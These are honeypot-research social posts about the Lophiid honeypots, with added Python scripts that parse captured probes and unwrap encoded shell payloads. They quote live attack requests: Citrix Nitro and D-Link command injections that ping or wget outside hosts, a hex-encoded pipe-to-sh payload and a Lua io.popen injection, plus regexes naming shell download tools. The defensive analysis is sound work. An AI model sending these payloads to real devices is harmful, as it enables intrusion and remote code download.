Niels Heinen

Information security engineer - security at scale - honeypots
GitHub: https://github.com/mrheinen

Exploit Database: Citrix Nitro SDK - Command Injection (CVE-2015-2838). webapps exploit for Linux platform

Interesting Netscaler payload caught by my Lophiid honeypots:

GET /nitro/v1/config/systemfile?args=filename:/etc/passwd%3Bping%20-c%204%20178.16.54.17 HTTP/1.1
Host: x.x.x.x
Connection: close
X-Nitro-Pass: nsroot
X-Nitro-User: nsroot

Does anyone know this vuln?

#honeypot #dfir #infosec #cybersecurity

@cR0w yes I think so too, that's also where I got the inspiration from to add it to my honeypots. I was hoping for some more targeted attacks with this one and not the usual large scans (given that it's not such a popular service) but I guess I was naive ;/
After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be a coincidence, but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan, for example, shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot

@hrbrmstr @iagox86 interesting!

Interesting! Thanks for sharing.

So I only have 50 honeypots (for personal entertainment) and I guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters, which really limits the coverage.

But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible).

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I've seen this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel
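Both probes quoted above (the Nitro `systemfile?args=filename:...` request and the D-Link `gena.cgi?service=` request) are the same pattern: a URL-encoded or raw shell metacharacter inside a query parameter, followed by a download or beacon command. The script below is an added example, not Lophiid's code, showing how a honeypot can triage such requests deterministically: parse the raw request (tolerating the unencoded spaces scanners put in the query, as the D-Link probe does), URL-decode the parameters, and flag values carrying shell metacharacters together with the URLs and IPs they reach out to. The two sample requests are constructed copies of the ones in the posts; the regexes and function names are this example's own.

```python
"""Triage of command-injection probes captured by an HTTP honeypot.

Added example (not Lophiid's code): parse a raw request, URL-decode the
query parameters and flag values that smuggle shell metacharacters, so the
Nitro and gena.cgi probes quoted above can be matched and their IOCs
(download URL, ping/beacon target) pulled out without a model in the loop.
"""
import re
from urllib.parse import unquote_plus

# Constructed copies of the two requests quoted in the posts above.
NITRO_REQUEST = (
    "GET /nitro/v1/config/systemfile?args=filename:/etc/passwd"
    "%3Bping%20-c%204%20178.16.54.17 HTTP/1.1\r\n"
    "Host: x.x.x.x\r\n"
    "Connection: close\r\n"
    "X-Nitro-Pass: nsroot\r\n"
    "X-Nitro-User: nsroot\r\n"
    "\r\n"
)
DLINK_REQUEST = (
    "SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/"
    "81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1\r\n"
    "Host: x.x.x.x\r\n"
    "Callback: <http://192.168.0.2:1337/ServiceProxy0>\r\n"
    "Connection: close\r\n"
    "Nt: upnp:event\r\n"
    "Timeout: Second-1800\r\n"
    "User-Agent: Mozilla/1.0\r\n"
    "\r\n"
)

# Characters that terminate or substitute a shell word, and the tools a
# successful injection usually calls next (download stage or ICMP/DNS beacon).
SHELL_META = re.compile(r"[;|&`]|\$\(")
SHELL_TOOLS = re.compile(r"\b(wget|curl|ping|nc|busybox|sh|bash)\b")
URL_RE = re.compile(r"https?://[^\s\"'`<>]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_request(raw):
    """Return (method, target, version, headers) for a raw HTTP request.

    The request line is not split naively on whitespace: scanners frequently
    send unencoded spaces inside the query (the D-Link probe does), so only
    the first token (method) and the last (HTTP version) are trusted and
    everything in between is the target.
    """
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) < 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, version = parts[0], parts[-1]
    target = " ".join(parts[1:-1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def query_params(target):
    """URL-decode the query string into (name, value) pairs.

    Split only on '&', never on ';': a ';' is exactly what an injection
    uses to chain a second command and must stay inside the value.
    """
    query = target.partition("?")[2]
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def triage(raw):
    """Flag parameters whose decoded value carries shell metacharacters."""
    method, target, _version, headers = parse_request(raw)
    findings = []
    for name, value in query_params(target):
        meta = sorted(set(SHELL_META.findall(value)))
        tools = sorted(set(SHELL_TOOLS.findall(value)))
        if meta or tools:
            findings.append({
                "param": name,
                "decoded": value,
                "metachars": meta,
                "tools": tools,
                "urls": URL_RE.findall(value),
                "ips": IP_RE.findall(value),
            })
    return {
        "method": method,
        "path": target.partition("?")[0],
        "headers": headers,
        "findings": findings,
    }


if __name__ == "__main__":
    for raw in (NITRO_REQUEST, DLINK_REQUEST):
        report = triage(raw)
        print(report["method"], report["path"])
        for f in report["findings"]:
            print("  %s=%r meta=%s tools=%s ips=%s" % (
                f["param"], f["decoded"], f["metachars"], f["tools"], f["ips"]))
```

Running it on the Nitro request yields one finding on `args` with the decoded value `filename:/etc/passwd;ping -c 4 178.16.54.17`; on the D-Link request it yields one finding on `service` with backticks and `;` as metacharacters, `wget` as the tool, and the download URL as the IOC. The `X-Nitro-User`/`X-Nitro-Pass` headers come back in `headers`, so the default `nsroot` credentials used by the scanner are visible in the same report.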

My Lophiid honeypots use various LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 Flash, and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex, and it understood that the resulting string was a shell command that echoed the string "RCE_TEST_123".

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential.

#infosec #dfir #honeypot
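The `echo <hex> | xxd -r -p | sh` chain above is an encoding layer, not the command itself, and that layer can be peeled off deterministically before (or instead of) asking a model what the payload does. The script below is an added example, not Lophiid's code: it recognises `echo <blob> | <decoder> | sh` pipelines for hex (`xxd -r -p`) and base64 (`base64 -d`), decodes recursively, and returns the innermost command that would actually reach `sh`. The hex payload is the one from the post; the base64 wrapper around it is constructed here to show the recursion, and the function and constant names are this example's own.

```python
"""Static unwrapping of `echo <blob> | <decoder> | sh` payloads.

Added example, not Lophiid's code: before (or instead of) asking a model
what a payload does, peel the encoding layers off deterministically so the
emulator is handed the command that would actually reach `sh`.
"""
import base64
import re

# The payload quoted in the post above, plus a constructed base64 wrapper
# around it to show that layers are peeled recursively.
HEX_PAYLOAD = "echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh"
NESTED_PAYLOAD = "echo %s | base64 -d | sh" % base64.b64encode(
    HEX_PAYLOAD.encode()).decode()

# Pipeline stages that turn an inert blob back into bytes.
DECODERS = {
    "hex": (re.compile(r"^xxd\s+-r\s+-p$"), bytes.fromhex),
    "base64": (re.compile(r"^base64\s+(-d|--decode)$"), base64.b64decode),
}
ECHO_STAGE = re.compile(r"^echo\s+(?:-[neE]\s+)?(\S+)$")
SHELLS = {"sh", "bash", "/bin/sh", "/bin/bash"}


def unwrap(command, max_depth=8):
    """Return (innermost_command, layers) for an echo|decoder|sh chain.

    Only the outer pipeline is split on '|'; once a decoded blob no longer
    looks like `echo <blob> | <decoder>`, it is returned untouched, so a
    '|' inside the real payload is preserved rather than re-parsed.
    """
    current = command.strip()
    layers = []
    for _ in range(max_depth):
        stages = [s.strip() for s in current.split("|")]
        if len(stages) not in (2, 3):
            break
        echo = ECHO_STAGE.match(stages[0])
        if echo is None:
            break
        if len(stages) == 3 and stages[2] not in SHELLS:
            break
        decoded = None
        for name, (pattern, decode) in DECODERS.items():
            if pattern.match(stages[1]):
                try:
                    decoded = decode(echo.group(1)).decode("utf-8", "replace")
                except ValueError:  # bad hex / bad base64: leave as-is
                    return current, layers
                layers.append(name)
                break
        if decoded is None:
            break
        current = decoded
    return current, layers


if __name__ == "__main__":
    # The hex blob decodes to '|echo%20RCE_TEST_123': note the leading '|'
    # and the literal '%20' (the URL encoding was never undone). A real sh
    # rejects a line that starts with '|' as a syntax error, so an emulator
    # that reports "RCE_TEST_123" is being more forgiving than the shell.
    print(unwrap(HEX_PAYLOAD))
    print(unwrap(NESTED_PAYLOAD))
```

What comes out for the post's payload is the string `|echo%20RCE_TEST_123`, one `hex` layer deep. That is worth feeding to the emulator verbatim rather than a paraphrase: the leading `|` and the undecoded `%20` are exactly the details that decide whether a real shell would print anything at all, and a model that is handed the decoded bytes has less room to guess.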

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password="

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812."

*sigh*

#dfir #infosec #cybersecurity #honeypot

My Lophiid honeypots got spammed with payloads like "234513+true+1994175". The LLM integration understood the intricacies of JavaScript and caused the honeypots to respond with the correct answer, 2228689.

#honeypot #dfir #infosec #aisecurity #cybersecurity #llm